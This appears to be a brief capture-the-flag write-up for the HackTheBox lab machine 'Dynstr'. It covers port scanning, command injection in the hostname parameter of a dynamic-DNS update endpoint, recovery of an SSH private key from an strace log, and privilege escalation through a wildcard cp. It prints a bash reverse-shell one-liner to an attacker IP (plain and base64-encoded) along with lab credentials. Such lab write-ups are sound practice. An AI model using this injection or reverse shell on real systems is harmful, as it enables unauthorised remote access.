DYNSTR
Scanning
NMAP
22/tcp open ssh
53/tcp open domain
80/tcp open httpEnumeration
port 80

we have beta mode
Credentials dynadns:sndanyd


whatweb
after some directory busting
i found this http://dynstr.htb/nic/update

after some googling i found this page

lets preform this using BurpSuite ... you may get 911 [wrngdom: htb] so try to change hostname
with these values


Exploit
Test hostname Parameter by adding ; or `
we can use `` in hostname param without break logic
reverse shell bash -i >& /dev/tcp/10.10.16.17/4242 0>&1
base64 encode YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4xNy80MjQyIDA+JjEK to keep logic up
some bash to decode payload on target
if we try to send like that logic down
so use url encoding
add Authorization: Basic ZHluYWRuczpzbmRhbnlk header value = base64(dynadns:sndanyd)

setup listener and Send

Finally in π
Getting User
there is 2 users bindmgr, dyna
in this directory /home/bindmgr/support-case-C62796521 we fine strace-C62796521.txt
cat strace-C62796521.txt
we find private key

copy it to attacker machine
chmod 600 pri_key
ssh targ not working ....
add ip zone

ssh again it works

Privilege Escalation

cat this script find this

this part is the key WILDCARD π
if this line may looks confuse explain β¬οΈ
cp [source] [source] [destination]
cp .version * /etc/bind/named.bindmgr/
